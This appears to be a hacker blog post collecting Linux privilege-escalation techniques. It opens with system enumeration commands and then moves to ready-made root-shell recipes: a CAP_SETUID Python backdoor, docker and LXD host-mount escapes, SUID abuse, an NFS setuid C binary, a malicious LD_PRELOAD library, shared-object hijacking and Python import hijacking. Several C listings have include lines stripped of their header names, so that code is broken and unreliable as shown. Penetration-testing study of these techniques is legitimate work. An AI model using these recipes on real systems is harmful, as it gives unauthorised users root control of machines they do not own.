Linux Privilege Escalation

Hello hackers, I've finally decided to put together all of the different ways to perform privilege escalation on a Linux system.

We assume that we now have a shell on the remote system. However, depending on how access was obtained, we may not yet have "root" privileges. The following techniques can be used to elevate privilege.

Gathering Information of the System

To escalate privileges on a Linux system, it’s crucial to gather as much information about the environment as possible. This helps identify potential weaknesses or misconfigurations that can be exploited.

1. Check OS Information

cat /etc/os-release

2. Inspect PATH

echo $PATH

3. List Environment Variables

env

4. Kernel Version

uname -a

5. List Available Shells

cat /etc/shells

6. Routing Table

route
netstat -rn

7. ARP Table

arp -a

8. Find SUID/SGID Files

find / -perm /4000 2>/dev/null

9. Running Processes

ps aux

10. Installed Packages

dpkg -l
rpm -qa

11. Crontab Entries

crontab -l
cat /etc/crontab

12. Active Network Connections

netstat -tuln

13. Mounted Filesystems

mount

14. Writable Directories

find / -writable -type d 2>/dev/null

15. Check sudo Privileges

sudo -l

Capabilities

Capabilities split root privileges into independent units that can be enabled per process.

Viewing Capabilities

getcap /path/to/binary

Setting Capabilities

sudo setcap 'cap_net_bind_service=+ep' /usr/bin/somebinary

Removing Capabilities

sudo setcap 'cap_net_bind_service=-ep' /usr/bin/somebinary

Effective Capabilities

capsh --print

Example: CAP_SETUID Backdoor

cp $(which python) .
sudo setcap cap_setuid+ep python
./python -c 'import os; os.setuid(0); os.system("/bin/sh")'

Docker Privilege Escalation

If the user is in the docker group, they can mount the host filesystem and obtain root.

docker run -v /:/mnt -it alpine

LXC / LXD Privilege Escalation

lxd init
lxc image import alpine.tar.gz --alias alpine
lxc init alpine dreamy -c security.privileged=true
lxc config device add dreamy mydev disk source=/ path=/mnt/root recursive=true
lxc start dreamy
lxc exec dreamy /bin/sh

SUID Privilege Escalation

Find SUID binaries:

find / -perm -4000 2>/dev/null

Python SUID Exploit Example

/usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-i")'

Cron Job Privilege Escalation

Check cron jobs:

crontab -l
cat /etc/crontab

Monitor cron jobs:

./pspy64

Exploiting NFS Weak Permissions

Check exports:

showmount -e {ip}

Exploit Example:

# exploit.c
#include 
#include 
#include 
#include 

int main(void) {
  setuid(0); setgid(0); system("/bin/bash");
}

gcc exploit.c -o exploit
sudo mount -t nfs {target_ip}:/tmp /mnt
cp exploit /mnt
chmod u+s /mnt/exploit
# Then on target:
./exploit

Sudo + LD_PRELOAD

Malicious Shared Library:

# malicious.c
#include 
#include 
#include 

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

gcc -fPIC -shared -o malicious.so malicious.c -nostartfiles
sudo LD_PRELOAD=./malicious.so /usr/bin/ping

Shared Object Manipulation

ldd dbs
readelf -d dbs | grep PATH

# malicious.c
#include
#include

void dbquery() {
    printf("Hacked by dreamy");
    setuid(0);
    system("/bin/sh -p");
}

gcc malicious.c -fPIC -shared -o /dreamy/thisislibrary.so

Python Library Hijacking

Find library load order:

python3 -c 'import sys; print("\n".join(sys.path))'

Place a malicious numpy.py earlier in the load path to hijack imports.

Using PYTHONPATH + sudo SETENV:

sudo PYTHONPATH=/tmp/ /usr/bin/python3 script.py

Have fun, hack ethically!
Regards, dr3amy.